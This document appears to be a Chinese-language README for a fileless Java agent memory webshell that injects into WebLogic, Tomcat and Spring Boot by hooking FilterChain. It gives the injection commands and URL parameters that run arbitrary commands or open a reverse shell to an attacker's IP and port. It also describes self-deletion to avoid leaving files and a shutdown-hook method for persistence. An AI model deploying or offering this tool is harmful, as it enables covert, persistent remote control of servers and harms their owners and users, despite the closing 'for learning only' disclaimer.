Awesome

说明

一个基于javaagent+ASM的无文件落地的javaagent，兼容多种容器(weblogic,Tomcat,Springboot).

inject jdk要求

Java 8

agent jdk要求

Java 6-11

兼容版本

weblogic 10.3.6
weblogic 12.2.1.2
weblogic 12.2.1.3
weblogic 12.1.3.0
Tomcat 8.5.61
Spring boot

测试平台

macos 10.0+
centos 7.1
windows 10
windows 11

使用说明

inject 参数

java -jar inject.jar [your_password]  # 通用运行
java -jar inject.jar -p               # 打印所有运行的java进程名
java -jar inject.jar [your_password] [process_name] # 定向注入到[process_name]

请求参数

任意url?psw =[your_password]&cmd=[your_cmd]  执行任意命令
任意url?psw =[your_password]&ip=[attack_ip]&port=[attack_port] 反弹shell

测试案例

运行java -jar inject-1.0.jar x1001 java 在服务器端可以看到以下，说明注入成功，并删除当前jar包，达到无shell状态： server 访问任意url，带上参数psw=your_password&cmd=your_cmd request 当应用关闭时。攻击jar包自动生成到java虚拟机目录下。 persist 下次启动，自动注入达到持久化的效果。 persist2

经测试，通过kill -9或者强制结束进程杀死容器进程，并不会触发addShutdownHook,也就不会持久化。网上查询以下几种杀死进程的情况:

所有的线程已经执行完毕（√）

调用System.exit()（√）

用户输入Ctrl+C（√）

遇到问题异常退出（√）

kill -9 杀掉进程（×）

更新

2021/06/19

修改hook点为javax/servlet/FilterChain，使其同时兼容tomcat.
weblogic注入内存马，现在访问任意url，带上密码和命令即可

2021/12/02

简化hook流程
去除大部分打印
inject.jar增加自定义hook的进程
增加反弹shell

参考

https://github.com/rebeyond/memShell

声明

本项目仅供学习使用，勿做它用